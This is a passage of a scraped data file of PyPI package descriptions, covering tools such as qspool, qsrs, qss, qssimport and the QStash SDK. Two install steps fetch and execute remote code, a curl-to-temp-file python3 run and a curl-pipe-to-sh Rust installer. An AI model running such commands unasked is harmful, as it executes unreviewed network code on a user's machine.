(meaning\\(\\otimes\\)), or with strings>>>uu=u**u>>>dd=ket('|dd>')# or ket('dd')>>>s=(d**u**u+u**d**u+d**d**u).N>>>s0.57735|udu>+0.57735|duu>+0.57735|ddu>Multi-particle operators are similarly built up with Kronecker products>>>s2x=sx**sx>>>s2x[[0001][0010][0100][1000]Partial TraceThe density matrix for a multi-particle state is\\(2^n \\times 2^n\\). A partial\ntrace is a way to form the density matrix for a subset of the particles. \u2018Tracing out\u2019\\(m\\)of the particles results in a\\(2^{n-m} \\times 2^{n-m}\\)density matrix.\nPartial traces are important in many aspects of analyzing the multi-particle state,\nincluding evaluating the entanglement.>>>sing=(u**d-d**u).N>>>rho=sing.density()>>>rhomatrix([[0.,0.,0.,0.],[0.,0.5,-0.5,0.],[0.,-0.5,0.5,0.],[0.,0.,0.,0.]])>>>rhoA=ptrace(rho,[1])# trace over particle 1 ('Bob') to get particle 0 ('Alice') density>>>rhoAmatrix([[0.5,0.],[0.,0.5]])Entangled StatesOnce you have created a (possibly) entangled state of two particles, you can test it for entanglement:>>>sing=(u**d-d**u).N>>>sing.entangled()True>>>(u**u).entangled()FalseThe test for entanglement is to check the entropy of one of the particles after\nthe other particle has been \u2018traced out.\u2019Quantum ComputingSeveral quantum logic gates are now defined in qspin including:\nHadamard, NOT, SWAP, controlled gates, square root gates, and phase shift gates.>>>fromqspinimportu,d,gate>>>SWAP=gate('SWAP')>>>SWAP*(u**d)|du>>>>H=gate('Hadamard')>>>H*u0.707|u>+0.707|d>>>>H*d0.707|u>-0.707|d>shows that SWAP interchanges the q-bits, and Hadamard makes the Bell states\nfrom spin up and spin down."} +{"package": "qspool", "pacakge-description": "UsageYou need to submit more slurm scripts than fit on the queue at once.tree.\n.\n\u251c\u2500\u2500slurmscript0.slurm.sh\n\u251c\u2500\u2500slurmscript1.slurm.sh\n\u251c\u2500\u2500slurmscript2.slurm.sh\n\u251c\u2500\u2500slurmscript3.slurm.sh\n\u251c\u2500\u2500slurmscript4.slurm.sh\n\u251c\u2500\u2500slurmscript5.slurm.sh\n\u251c\u2500\u2500slurmscript6.slurm.sh\n\u251c\u2500\u2500slurmscript7.slurm.sh\n\u251c\u2500\u2500slurmscript8.slurm.sh\n...Theqspoolscript will feed your job scripts onto the queue as space becomes available.python3-mqspool*.slurm.shYou can also provide job names via stdin, which is useful for very large job batches.find.-maxdepth1-name'*.slurm.sh'|python3-mqspoolTheqspoolscript creates a slurm job that submits your job scripts.\nWhen queue capacity fills, thisqspooljob will schedule a follow-up job to submit any remaining job scripts.\nThis process continues until all job scripts have been submitted.usage: qspool.py [-h] [--payload-job-script-paths-infile PAYLOAD_JOB_SCRIPT_PATHS_INFILE] [--job-log-path JOB_LOG_PATH] [--job-script-cc-path JOB_SCRIPT_CC_PATH]\n [--queue-capacity QUEUE_CAPACITY] [--qspooler-job-title QSPOOLER_JOB_TITLE]\n [payload_job_script_paths ...]\n\npositional arguments:\n payload_job_script_paths\n What scripts to spool onto slurm queue? (default: None)\n\noptions:\n -h, --help show this help message and exit\n --payload-job-script-paths-infile PAYLOAD_JOB_SCRIPT_PATHS_INFILE\n Where to read script paths to spool onto slurm queue? (default: <_io.TextIOWrapper name='' mode='r' encoding='utf-8'>)\n --job-log-path JOB_LOG_PATH\n Where should logs for qspool jobs be written? (default: ~/slurm_job_log/)\n --job-script-cc-path JOB_SCRIPT_CC_PATH\n Where should copies of submitted job scripts be kept? (default: ~/slurm_job_script_cc/)\n --queue-capacity QUEUE_CAPACITY\n How many jobs can be running or waiting at once? (default: 1000)\n --qspooler-job-title QSPOOLER_JOB_TITLE\n What title should be included in qspooler job names? (default: none)Installationno installation:python3\"$(tmpfile=\"$(mktemp)\";curl-shttps://raw.githubusercontent.com/mmore500/qspool/v0.4.2/qspool.py>\"${tmpfile}\";echo\"${tmpfile}\")\"[ARGS]pip installation:python3-mpipinstallqspool\npython3-mqspool[ARGS]qspoolhas zero dependencies, so no setup or maintenance is required to use it.\nCompatible all the way back to Python 3.6, so it will work on your cluster's ancient Python install.How it Worksqspool\n * read contents of target slurm scripts\n * instantiate qspooler job script w/ target slurm scripts embedded\n * submit qspooler job script to slurm queue\u2b07\ufe0f \u2b07\ufe0f \u2b07\ufe0fqspooler job 1\n * submit embedded target slurm scripts one by one until queue is almost full\n * instantiate qspooler job script w/ remaining target slurm scripts embedded\n * submit qspooler job script to slurm queue\u2b07\ufe0f \u2b07\ufe0f \u2b07\ufe0fqspooler job 2\n * submit embedded target slurm scripts one by one until queue is almost full\n * instantiate qspooler job script w/ remaining target slurm scripts embedded\n * submit qspooler job script to slurm queue...qspooler job n\n * submit embedded target slurm scripts one by one\n * no embedded target slurm scripts remain\n * exitRelated Softwareroll_quses a similar approach to solve this problem.roll_qdiffers in implementation strategy.roll_qtracks submission progress via an index variable in a file associated with a job batch.qspoolembeds jobs in the submission worker script itself."} +{"package": "qspy", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qspypy", "pacakge-description": "The qspypy packageTheqspypypackage is a rewrite of the existing Tcl qspy and qutest scripts\nusing Python 3.6.This package currently contains two main modules:qspyandqutest.At some point in the future, theqspyviewfront end may be added as well.Since Python comes with Tk, the translation effort shouldn't be too great.The qspy moduleThe qspy module is the interface to the qspy back end application that ultimately\ninterfaces with the target. This module provides a series of message send and\ncallback methods so that knowledge of communications is hidden from qutest.The qutest moduleThe qutest module is designed to be run using the powerfulpytestPython testing framework.Pytest makes it easy to discover and run your qutest scripts,\nin addition to a host of other features like jUnit XML output for Jenkins\nand hundreds of other plugins.Finally, qutest provides the added feature of automatically starting qspy\nfor you (assuming it's on your path) at the start of every test session. This\nbehavior and other options can be customized via the standardconftest.pypytest configuration script.InstallationInstallation is through pip:pip3 install qspypyTcl Script ConversionAs of qspypy 1.1.0, a new system wide command line utility is provided calledqutest_convert.This script can domostof the conversion of a test script\nfrom Tcl to Python for you (e.g. it doesn't convert Tcl binary format to Python\nstruck.pack).Simply provide the list of Tcl test files to convert, for example:qutest_convert test_table.tcl test_philo.tclIn additon, this utility will create a defaultconftest.py.Test Creation and Test FixturesIf you understand how the existing Tcl based qutest scripts are written,\nit should not be too difficult for you to understand the qutest/pytest versions.Each pytest test function can derive from one or more test fixtures. These\ntest fixtures (defined in the qspypy.fixtures module) provide a context fortests and execute before (and optionally after with ayield) each test.Fixtures replace the standard xUnit setUp and tearDown methods.Qspypy provides two basic test fixtures for you to use for your tests:qutestandqutest_noreset.Qutest and qutest_norest both provide the same per-test context,\nbut qutest_noreset does not reset the target. Both of these contexts contain\nthe qutest_context methods that are identical (except for Coninue) to the\nqutest.tcl procedure names.In addition to these, you can provide your own common test fixture, either inconftest.pyfor global access or in each individual script.Example from qpcpp version 6.3.2Here is a part of the dpptest_philo.pytest script.The full example of this and thetest_table.pyis available onGitHub.import sys\nimport pytest\nimport struct\nfrom qspypy.qspy import FILTER, QS_OBJ_KIND\n\n\ndef on_reset(qutest):\n \"\"\" Common reset handler called by qutest after resetting target \"\"\"\n\n qutest.expect_pause()\n qutest.glb_filter(FILTER.SM)\n qutest.loc_filter(QS_OBJ_KIND.SM_AO, 'AO_Philo<2>')\n qutest.Continue() # note continue in lower case. is a reserved word in python\n qutest.expect(\"===RTC===> St-Init Obj=AO_Philo<2>,State=QP::QHsm::top->thinking\")\n qutest.expect(\"===RTC===> St-Entry Obj=AO_Philo<2>,State=thinking\")\n qutest.expect(\"%timestamp Init===> Obj=AO_Philo<2>,State=thinking\")\n qutest.glb_filter(FILTER.SM, FILTER.AO, FILTER.UA)\n qutest.current_obj(QS_OBJ_KIND.SM_AO, 'AO_Philo<2>')\n\n\ndef test_TIMEOUT_Philo_post(qutest):\n qutest.post('TIMEOUT_SIG')\n qutest.expect(\"%timestamp AO-Post Sdr=QS_RX,Obj=AO_Philo<2>,Evt,Evt Obj=AO_Philo<2>,Sig=TIMEOUT_SIG,State=thinking\")\n qutest.expect(\"===RTC===> St-Exit Obj=AO_Philo<2>,State=thinking\")\n qutest.expect(\"===RTC===> St-Entry Obj=AO_Philo<2>,State=hungry\")\n qutest.expect(\"%timestamp ===>Tran Obj=AO_Philo<2>,Sig=TIMEOUT_SIG,State=thinking->hungry\")\n qutest.expect(\"%timestamp Trg-Done QS_RX_EVENT\")\n\ndef test_publish_EAT_2(qutest_noreset): \n qutest = qutest_noreset # Rename for consistancy\n qutest.loc_filter(QS_OBJ_KIND.SM_AO, 'AO_Philo<2>')\n qutest.publish('EAT_SIG', struct.pack('< B', 2)) # Send byte of value 2\n qutest.expect(\"%timestamp AO-Post Sdr=QS_RX,Obj=AO_Philo<2>,Evt,Evt Obj=AO_Philo<2>,Sig=EAT_SIG,State=hungry\")\n qutest.expect(\"%timestamp BSP_CALL BSP::random 123\")\n qutest.expect(\"===RTC===> St-Entry Obj=AO_Philo<2>,State=eating\")\n qutest.expect(\"%timestamp ===>Tran Obj=AO_Philo<2>,Sig=EAT_SIG,State=hungry->eating\")\n qutest.expect(\"%timestamp Trg-Done QS_RX_EVENT\")NOTEIn order to send arbitrary binary packet data, Python'sstructclass can be used.For example:qutest.dispatch('EAT_SIG', struct.pack('< B', 2))Configurion and Running TestsIn order to run a python qutest script, you need to provide a standard pytestconftest.pyconfiguration file. This file needs no modifications to use the\nnew qutest command line tool.The file must contain the following at a minimum:#\n# pytest configuration file\n#\n\n# Load common fixtures used throughout testing\nfrom qspypy.fixtures import session, reset, module, qutest, qutest_noresetAlternatively, this file can be modified to change the behavior of qutest by\nmodifying its configuration.For example, to have the qspy backend start automatically, add the following:# Load default configuration so we can change it before running\nimport qspypy.config as CONFIG\n\n# Automatically start/stop qspy for the session\nCONFIG.AUTOSTART_QSPY = True\n\n## NOTE: You must change this to be the port your target is connected to\nCONFIG.QSPY_COM_PORT = 'COM3'Test executionThe qspypy package creates a system wide executablequtestthat provides\nthe identical interface at the existing qutest.tcl script.For example, to run all of the dpp mingw example test scripts you would enter\nthe following terminal command in /examples/qutest/dpp:qutest *.py mingw/test_dpp.exeWhich produces the following output:============================= test session starts =============================\nplatform win32 -- Python 3.6.4, pytest-3.6.1, py-1.5.3, pluggy-0.6.0 -- c:\\tools\\python\\python36\\python.exe\ncachedir: .pytest_cache\nrootdir: C:\\tools\\qp\\qpcpp_6.3.2\\examples\\qutest\\dpp, inifile:\ncollected 8 items\n\ntest_philo.py::test_TIMEOUT_Philo_post PASSED [ 12%]\ntest_philo.py::test_publish_EAT_2 PASSED [ 25%]\ntest_philo.py::test_TIMEOUT_Philo_thinking_ASSERT PASSED [ 37%]\ntest_philo.py::test_TIMEOUT_Philo_eating_PUBLISH_from_AO PASSED [ 50%]\ntest_philo.py::test_timeEvt_Philo_tick PASSED [ 62%]\ntest_table.py::test_PAUSE_Table PASSED [ 75%]\ntest_table.py::test_SERVE_Table_1 PASSED [ 87%]\ntest_table.py::test_SERVE_Table_2 PASSED [100%]\n\n========================== 8 passed in 10.13 seconds ==========================Known IssuesSupport for config.AUTOSTART_QSPY mac not testedPotential issue with dropped characters on linuxRelease Notes1.1.0Added missing qutest: fill, peek, pokeAdded command line toolqutestpywhich is interface compatible with existing\nqutest.tcl script.Added command line toolqutestpy_convertto convert tcl scripts to python.Fixed bug with missing setup and teardown calls.Qutest will no longer show a console for local targets, this can be changed by\nsetting LOCAL_TARGET_USES_CONSOLE to True.Added new configuration QSPY_LOCAL_UDP_PORT to specify local UDP port.Simplifed test fixtures to just require qutest or qutest_noreset.Added reset, setup and teardown callbacks via registration in module fixture.No longer kills local_target process but relies on reset message only.Added remaining test examples1.0.1Fixed crash on linuxAdded config.AUTOSTART_QSPY support for linux via gnome-terminalNow defaults to config.AUTOSTART_QSPY to False1.0.0Initial release to PyPiSource File DescriptionFileDescriptonconfig.pyConfiguration values used in qutest.pyfixtures.pypytest fixtures to used in the user's conftest.pyqspy.pyThe Python implementation of the qspy.tcl qspy interface libraryqutest.pyThe Python implementaition of qutest.tclqutest_convert.pyCommand line tool for file Tcl to Python conversiontestsDirectory containing Python versions of test scripts"} +{"package": "qsql", "pacakge-description": "PyQuickSQLFor a more thorough explanation seeexample.ipynbHow to use the query loader:importquicksqlasqqqueries=qq.LoadSQL('path/to/queries.sql')Printing the queries should give you something like this:LoadSQL('path/to/queries.sql')\nQuery Name: examplequery_1, Params: order_avg, num_orders\nQuery Name: examplequery_2, Params: sdate, edate, product_idThese are callable objects that return the string given the non-optional **params.They are equivalent to an f-string + a lambda but loaded from an sql file and stored in the LoadSQL object.print(str(queries))will give you the raw SQL string.How to use them:print(queries.examplequery_2(product_id=10,sdate='1-10-2022',edate=qq.NoStr(\"DATE'4-11-2023'\"),something_not_a_param='test'))Unused variables: something_not_a_param in query examplequery_2Above will be printed as a warning with invalid inclusions, no non-verbose option yet.SELECTc.CustomerName,o.OrderDate,o.Status,(SELECTSUM(od.Quantity*od.UnitPrice)FROMOrderDetailsodWHEREod.OrderID=o.OrderID)ASTotalValueFROMCustomerscINNERJOINOrdersoONc.CustomerID=o.CustomerIDWHEREo.OrderDateBETWEEN'1-10-2022'ANDDATE'4-11-2023'ANDEXISTS(SELECT1FROMOrderDetailsodWHEREod.OrderID=o.OrderIDANDod.ProductID=10)ORDERBYTotalValueDESC;How to use the file cache:This is very similar to functool'scache, with the main difference being that@qq.file_cachecaches the asset to memory\nand to you system's default temporary directory. If the memory cache ever fails (eg a restarted kernel) it will load the asset from it's pickled file.fromrandomimportrandintimportquicksqlasqq@qq.file_cache()deftest_mem(size:int):return[randint(0,10)for_inrange(size)]print(test_mem(8))[10, 3, 4, 9, 2, 2, 4, 2]print(test_mem(8))[10, 3, 4, 9, 2, 2, 4, 2]To clear the cache:qq.clear_cache()For more examples and how to configure seeexample.ipynb"} +{"package": "qsqla", "pacakge-description": "qsqla===============================[![Build Status](https://travis-ci.org/blue-yonder/qsqla.svg?branch=master)](https://travis-ci.org/blue-yonder/qsqla)qSQLA is a query builder for SQLAlchemy Core SelectablesInstallation / Usage--------------------To install use pip:$ pip install qsqlaOr clone the repo:$ git clone https://github.com/blue-yonder/qsqla.git$ python setup.py installExample-------```pythonfrom sqlalchemy import create_engine, MetaData, Table, Column, Integer, Stringdb = create_engine(\"sqlite:////:memory:\")md = MetaData(bind=db)table = Table('user',md,Column('id', Integer, primary_key=True),Column('name', String(16), nullable=False),Column('age', Integer))sel = table.select()from qsqla.query import query, build_filtersfilter = build_filters({\"id__eq\":1})stm = query(sel, filter)```"} +{"package": "qs-qrcode", "pacakge-description": "install:pip install qs-qrcodeusageuse in cmd:qsqrcode-lH-m\u5531\u6b4c\u4e0d\u5982\u8df3\u821e-s400-b20-c#569932or if you did not install with pip:pythonqsqrcode.py-lH-m\u5531\u6b4c\u4e0d\u5982\u8df3\u821e-s400-b20-c#569932and for more usage:qsqrcode-huse in python:fromqsqrcode.qrcodeimportQrcodeqr=Qrcode('test it')qr.generate('testpic/test.png')more usagefromqsqrcode.qrcodeimportQrcode# Qrcode \u7684\u7b2c\u4e8c\u4e2a\u53c2\u6570\uff0cL \u2248 7%\u5bb9\u9519\uff0cM \u2248 15%\u5bb9\u9519\uff0cQ \u2248 25%\u5bb9\u9519\uff0cH \u2248 30%\u5bb9\u9519Qrcode('test','L').generate('testpic/test7.png')Qrcode('test','M').generate('testpic/test8.png')Qrcode('test','Q').generate('testpic/test9.png')Qrcode('test','H').generate('testpic/testA.png')Qrcode('\u586b\u5145\u989c\u8272','H').colour('#1294B8').resize(250).generate('testpic/test1.png')Qrcode('\u586b\u5145\u56fe\u7247','H').paint('pic/testbg.jpg').resize(250).generate('testpic/test2.png')Qrcode('\u518d\u770b\u770b\u5982\u4f55\u52a0border','H').paint('pic/test.jpg').resize(230).set_border(10).generate('testpic/test3.png')Qrcode('\u6d4b\u8bd5\u4e8c\u7ef4\u7801\u4e2d\u95f4\u52a0\u5165\u56fe\u7247','H').put_img_inside('pic/mystic.png').resize(375).generate('testpic/test4.png')Qrcode('gif\u8bd5\u8bd5\u770b\uff0c\u4f46\u6548\u679c\u5e76\u4e0d\u597d\u770b\uff0c\u800c\u4e14\u6682\u4e0d\u652f\u6301set_border','H').fill_gif('pic/pla.gif').resize(250).generate('testpic/testD.gif')"} +{"package": "qsr", "pacakge-description": "Simple Quick Screen RecordQuick Screen Record is The software that can help you record screen quickly.Usagefirst, install qsr, just typepip install qsron your terminalsecond, typeC:\\Users\\USER\\AppData\\Local\\Programs\\Python\\Python39\\Lib\\site-packages\\qsr\\qsr.pyon your terminal to run the softwarelast, just follow what the command say, and yeah, now you can use itRequirementOperating systemx64 bitProcessorDisplay1280 x 960 - 1920 x 1080OtherSupportFollow Us On\u00c2\u00a92021 R Stu Team \u00e2\u201d\u201a All Right Reserved."} +{"package": "qs-regression-model", "pacakge-description": "Example regression model package for QA sharing demo."} +{"package": "qsrs", "pacakge-description": "qsrs: qsearch Rust implementationThis is a (partial) implementation of the algorithm described in the paperHeuristics for Quantum Compiling with a Continuous Gate Set.\nHowever, re-writing in Rust has provided up to a 20x speedup in compilation time.\nAt some future point, this project will be usable as a stand-alone Rust program that will be able\nto compile quantum circuits.There are Python bindings to the Rust code that are used in the qsearch package. These\nshould automatically be installed from PyPi when you install qsearch.Installingqsrsis available on PyPi:pip3 install qsrsIf you would like to build from source see \"Building and Installing\" below.Supported gatesThe current list of \"gates\" supported is:IdentityX90ZX90Z (combined for performance reasons)IBM U3KroneckerProductX, Y, ZAny constant, unparameterized gate such as CNOTThis list will likely grow as needed.Building and InstallingIf you are on a 64 bit macOS, Windows, or Linux, you can install viapip3 install qsrs.You can also install from source.LinuxMake sure the version of pip you have is at least 20.0.2.\nYou can check viapip -Vand upgrade viapython3 -m pip install -U pip.First, install the dependencies. On modern Debian based machines you should be able to install the dependencies like the following,\nnote that the version of libgfortran-10-dev may be different.sudo apt install libopenblas-dev libceres-dev libgfortran-10-devOnce that is complete you should then install Rust like as follows:curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | shAccept all of the default prompts. You probably want tosource ~/.cargo/env, then switch to the nightly toolchain:rustup default nightlyThen you can enter theqsrsdirectory and runpip install .This will take a while. Once it is done, verify that the installation succeeded by runningpython3 -c 'import qsrs'It should not print anything out nor give any error.On Linux, you can also build wheels with Docker, staticly linking a custom builtopenblas.\nIncidently, this is how the packages on PyPi are built.Install dockerhttps://docs.docker.com/install/Run the container to build wheels:docker run --rm -v $(pwd):/io ethanhs/maturin-manylinux-2010:0.6 build --cargo-extra-args=\"--no-default-features --features python,static,rustopt\" --release --manylinux 2010 --no-sdistInstall the correct wheel for your Python version intarget/wheels(e.g.qsrs-0.13.0-cp37-cp37m-manylinux2010_x86_64.whlfor Python 3.7)MacOSMake sure the version of pip you have is at least 20.0.2.\nYou can check viapip -Vand upgrade viapython3 -m pip install -U pip.First, install the dependencies. We use homebrew here, which is what we build the official package against.brew install gcc ceres-solverOnce that is complete you should then install Rust like as follows:curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | shAccept all of the default prompts. You probably want tosource ~/.cargo/env, then switch to the nightly toolchain:rustup default nightlyThen you can enter theqsrsdirectory and run the following to build a wheel linking to Apple's Acceleratematurin build -i python --cargo-extra-args=\"--no-default-features --features=accelerate,python,rustopt,ceres/system\" --release --no-sdistThis will take a while. Once it is done, install the wheel likepip3 install target/wheels/qsrs-0.15.1-cp38-cp38-macosx_10_7_x86_64.whlNote the name of the wheel may be slightly different depending on your Python version, but it should be the only wheel in thetarget/wheels/folder.Verify that the installation succeeded by runningpython3 -c 'import qsrs'It should not print anything out nor give any error.WindowsMake sure the version of pip you have is at least 20.0.2.\nYou can check viapip -Vand upgrade viapython3 -m pip install -U pip.Download and install rust via the installer found athttps://rustup.rs/. Accept all of the defaults.Close your shell and open a new one (this updates the enviroment). Then runrustup default nightlyThen installcargo-vcpkg, which will help install dependencies for us. You can install it viacargo install cargo-vcpkgcargois installed with Rust so this should work.Then in the qsrs folder, runcargo vcpkg buildThis will likely take a while.Once it is done, build a wheel viamaturin build -i python --cargo-extra-args=\"--no-default-features --features python,static,rustopt\" --release --no-sdistThen you should be able to install the generated wheel package likepip install -U target\\wheels\\qsrs-0.15.1-cp37-none-win_amd64.whlNote the name of the wheel may be slightly different depending on your Python version, but it should be the only wheel in thetarget/wheels/folder.Verify that the installation succeeded by runningpython3 -c 'import qsrs'It should not print anything out nor give any error.UsagePlease see theqsearchwikifor how to use this with qsearch.\n`Testing and ContributingTo run the tests, clone the repo then run:$ pip install .\n$ pip install -r ../test-requirements.txt\n$ cd .. && pytestLicenseSince NLOpt's L-BFGS implementation is LGPL licensed, if therustoptfeature is enabled\n(it is enabled by default), qsrs is LGPL licensed as it statically links to NLOpt.\nIf you disable therustoptfeature, then the combined work is BSD 3 clause licensed.In addition, if you disablerustopt, you can still enable theceresfeature for a BSD-3\nlicensed product, but since this crate is usually dynamically linked in the end, it doesn't\nreally matter.\nPlease see LICENSE for more information."} +{"package": "qss", "pacakge-description": "QSS: Quadratic-Separable SolverQSS solves problems of the form$$\\begin{equation*} \\begin{array}{ll} \\text{minimize} & (1/2) x^T P x + q^T x + r + g(x) \\\\ \\text{subject to} & Ax = b \\end{array} \\end{equation*}$$where $x \\in \\bf{R}^n$ is the decision variable being optimized over. The\nobjective is defined by a positive definite matrix $P \\in \\bf{S}^n_+$, a vector\n$q \\in \\bf{R}^n$, a scalar $r \\in \\bf{R}$, and a $g$ that is separable in the\nentries of $x$, i.e., $g$ can be written as\n$$g(x) = \\sum_{i=1}^n g_i(x_i).$$\nThe constraints are defined by a matrix $A \\in \\bf{R}^{m \\times n}$ and a vector\n$b \\in \\bf{R}^m$.To use QSS, the user must specify $P$, $q$, $r$, $A$, $b$, as well as the $g_i$ from a built-in collection of separable functions.Installationpip install qssUsageAfter installingqss, import it withimportqssThis will expose the QSS class which is used to instantiate a solver object:solver=qss.QSS(data)Use thesolve()method when ready to solve:results=solver.solve(eps_abs=1e-5,eps_rel=1e-5,alpha=1.4,rho=0.1,max_iter=np.inf,precond=True,warm_start=False,reg=True,use_iter_refinement=False,verbose=False,)Parametersdata: dictionary with the following keys:'P','q','r','A','b'specify the quadratic part of the objective and the linear constraint as in the problem formulation above.'P'and'A'should bescipy.sparseCSC matrices or QSSLinearOperators (see below),'q'and'b'should benumpyarrays, and'r'should be a scalar.'A'and'b'can be excluded fromdataor set toNoneif the linear equality constraints are not needed.'g'is a list of separable function definitions. Each separable function is declared as a dictionary with the following keys:'g': string that corresponds to a valid separable function name (see below for a list of supported functions).'args':'weight'(default 1),'scale'(default 1),'shift'(default 0) allow the'g'function to be applied in a weighted manner to a shifted and scaled input. Some functions take additional arguments, see below.'range': tuple specifying the start index and end index that the function should be applied to.Note that the zero function will be applied to any indices that don't have another function specified for them.eps_abs: scalar specifying absolute tolerance.eps_abs: scalar specifying relative tolerance.alpha: scalar specifying overstep size.rho: scalar specifying ADMM step size.max_iter: maximum number of ADMM iterations to perform.precond: boolean specifying whether to perform matrix equilibration.warm_start: boolean specifying whether to warm start upon a repeat call ofsolve().reg: boolean specifying whether to regularize KKT matrix. May fail on certain problem instances if set toFalse.use_iter_refinement: boolean, only matters ifregisTrue. Helps mitigate some of the accuracy loss due to regularization.verbose: boolean specifying whether to print verbose output.ReturnsA list containing the following:objective: the objective value attained by the solution found byqss.solution: the solution vector.Separable functionsThe following convex separable functions are supported ( $\\mathcal{I}$ is the $\\{0, \\infty\\}$ indicator function):FunctionParameters$g_i(x)$zero$0$abs$|x|$is_pos$\\mathcal I(x \\geq 0)$is_neg$\\mathcal I(x \\leq 0)$is_boundlb: lower bound (default 0),ub: upper bound (default 1)$\\mathcal I(l \\leq x \\leq u)$is_zero$\\mathcal I(x = 0)$pos$\\max\\{x, 0\\}$neg$\\max\\{-x, 0\\}$quantiletau: scalar in $(0, 1)$$0.5 |x| + (\\tau - 0.5) x$huberM: positive scalar$x^2 \\text{ if } |x| \\leq M, 2M|x| - M^2 \\text{ else}$The following nonconvex separable functions are supported:FunctionParameters$g_i(x)$card$0$ for $x = 0$; $1$ for $x \\neq 0$is_int$\\mathcal I(x \\text{ is an integer})$is_finite_setS: Python list of scalars$\\mathcal I(x \\in S)$is_bool$\\mathcal I(x \\in \\{0,1\\})$Thet(weight),a(scale),b(shift) parameters are used to shift and scale the above as follows:t * g(ax - b).ExampleApplying the Huber function to a shifted version of the first 100 entries:[{\"g\":\"huber\",\"args\":{\"M\":2,\"shift\":-5},\"range\":(0,100)}]Abstract linear operatorsQSS comes with built-in support for abstract linear operators via theqss.linearoperator.LinearOperatorclass (hereafter referred to simply asLinearOperator).The easiest way to build aLinearOperatoris via its constructor. The argument to the constructor should be a list of lists representing a block matrix, in which each block is one of the following:SciPy sparse matrix orscipy.sparse.linalg.LinearOperatororqss.linearoperator.LinearOperatororNone.As an example, a constraint matrixAcould be built as follows:fromqss.linearoperatorimportLinearOperatorA=LinearOperator([[None,F,-I],[I,I,None]])WhereFis ascipy.sparse.linalg.LinearOperatorthat implements the Fourier transform andIis a SciPy sparse identity matrix.There are several helper functions available to facilitate the creation ofLinearOperators, all accessible throughqss.linearoperator:block_diag(D): Returns a block diagonalLinearOperatorfromD, a list of linear operators (SciPy sparse matrix,scipy.sparse.linalg.LinearOperator, orqss.linearoperator.LinearOperator).hstack(D): Horizontally concatenates list of linear operatorsDinto a singleLinearOperator.vstack(D): Vertically concatenates a list of linear operatorsDinto a singleLinearOperator.Left and right matrix multiplication between aLinearOperatorand a NumPy array is supported. Multiplication betweenLinearOperators is currently not supported. Matrix-vector multiplication between aLinearOperatorFand a NumPy arrayvcan be achieved withF.matvec(v)orF @ v. Multiplication with the adjoint ofFcan be achieved withF.rmatvec(v)orv @ F.Note that solve times may be slower whenLinearOperators are involved. If eitherPorAis aLinearOperator, the linear KKT system central to the QSS algorithm is solved indirectly, as opposed to directly via a factorization.ExampleNonnegative least squares is a problem of the form$$\\begin{equation*} \\begin{array}{ll} \\text{minimize} & (1/2) \\Vert Gx - h \\Vert_2^2 \\\\ \\text{subject to} & x \\geq 0. \\end{array} \\end{equation*} $$qsscan be used to solve this problem as follows:importnumpyasnpimportscipyasspimportqssp=100n=500G=sp.sparse.random(n,p,density=0.2,format=\"csc\")h=np.random.rand(n)data={}data[\"P\"]=G.T@Gdata[\"q\"]=-h.T@Gdata[\"r\"]=0.5*h.T@hdata[\"g\"]=[{\"g\":\"is_pos\",\"range\":(0,p)}]# Enforce x >= 0solver=qss.QSS(data)objective,x=solver.solve()print(objective)DevelopmentTo create a virtual environment, runpython3 -m venv envActivate it withsource env/bin/activateClone theqssrepository,cdinto it, and installqssin development mode:pip install -e ./ -r requirements.txtFinally, test to make sure the installation worked:pytest tests/"} +{"package": "qss-debugger", "pacakge-description": "No description available on PyPI."} +{"package": "qssimport", "pacakge-description": "qssimportqssimport allows you to use multiple qt stylesheet files for a single project by merging those stylesheets into a main qss file. Simply create a base .qss file that defines 1 or more @import statements that point to other stylesheets.Installationsudo pip install qssimportUsageThebase_diris the path to the stylesheetsTheimport_deffile is assumed to be stored in the stylesheets directoryimport_defis file where all of the @imports need to be definedThemain_stylesheetis an optional argument that defines the name of the compiled stylesheet.\nif a name is not provided, the program defaults to mainStyle.qssfrom qssimport import stylesheet\n...\napp = QApplication([])\n my_q_stylesheet = stylesheet.Stylesheet(base_dir='/path/to/stylesheets/',\n import_def_file='imports.qss',\n main_stylesheet='myStyle.qss')\napp.setStyleSheet(my_q_stylesheet.load_stylesheet())\n...ExampleGiven the following:import.qss@import \"lineEdit.qss\";\n@import \"widget.qss\";lineEdit.qssQLineEdit{color:#FFF;}\nQLineEdit{background:#A06;}widget.qssQWidget{background:#434343;}\nQWidget#MyWidget{background:#909090;}The file you specified asmain_stylesheetwill contain all of the lines fromlineEdit.qssandwidget.qssmyStyle.qssQLineEdit{color:#FFF;}\nQLineEdit{background:#A06;}\nQWidget{background:#434343;}\nQWidget#MyWidget{background:#909090;}"} +{"package": "qssp", "pacakge-description": "qsspA Python package for creating, manipulating and characterizing Quantum-State Stochastic Processes."} +{"package": "qstash-python", "pacakge-description": "Upstash Python QStash SDKQStashis an HTTP based messaging and scheduling solution for serverless and edge runtimes.QStash DocumentationUsageYou can get your QStash token from theUpstash Console.Publish a JSON messagefromupstash_qstashimportClientclient=Client(\"QSTASH_TOKEN\")client.publish_json({\"url\":\"https://my-api...\",\"body\":{\"hello\":\"world\"},\"headers\":{\"test-header\":\"test-value\",},})Create a scheduled messagefromupstash_qstashimportClientclient=Client(\"QSTASH_TOKEN\")schedules=client.schedules()schedules.create({\"destination\":\"https://my-api...\",\"cron\":\"*/5 * * * *\",})Receiving messagesfromupstash_qstashimportClient# Keys available from the QStash consolereceiver=Receiver({\"current_signing_key\":\"CURRENT_SIGNING_KEY\",\"next_signing_key\":\"NEXT_SIGNING_KEY\",})verified=receiver.verify({\"signature\":req.headers[\"Upstash-Signature\"],\"body\":req.body,\"url\":\"https://my-api...\",# Optional})Additional configurationfromupstash_qstashimportClientclient=Client(\"QSTASH_TOKEN\")# Create a client with a custom retry configuration. This is# for sending messages to QStash, not for sending messages to# your endpoints.# The default configuration is:# {# \"attempts\": 6,# \"backoff\": lambda retry_count: math.exp(retry_count) * 50,# }client=Client(\"QSTASH_TOKEN\",{\"attempts\":2,\"backoff\":lambdaretry_count:(2**retry_count)*20,})# Create Topictopics=client.topics()topics.upsert_or_add_endpoints(\"my-topic\",[{\"name\":\"endpoint1\",\"url\":\"https://example.com\"},{\"name\":\"endpoint2\",\"url\":\"https://somewhere-else.com\"}])# Publish to Topicclient.publish_json({\"topic\":\"my-topic\",\"body\":{\"key\":\"value\"},# Retry sending message to API 3 times# https://upstash.com/docs/qstash/features/retry\"retries\":3,# Schedule message to be sent 4 seconds from now\"delay\":4,# When message is sent, send 